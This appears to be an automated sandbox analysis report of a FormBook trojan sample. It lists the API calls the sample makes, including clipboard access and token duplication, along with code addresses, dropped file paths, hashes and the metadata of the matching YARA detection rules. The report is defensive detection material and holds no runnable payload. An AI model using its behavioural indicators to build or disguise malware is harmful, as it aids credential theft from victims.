Code function: 1_2_00F44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00406333
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF33B7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF23F5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EDE6F0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F0265E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF282A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F089BF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F06A74
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F50A3A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EE0BE0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F2EDB2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F50EB7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F38E44
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFF409
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EDF6A0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF78C3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF1BA8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F09CE5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF1FC0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFBFD6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0227
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF04D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041E81B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041DA1E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D5A6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041EF6B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041DFC2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041E798
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFBFD6

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\kmhbvf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D

Source: shedfam.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
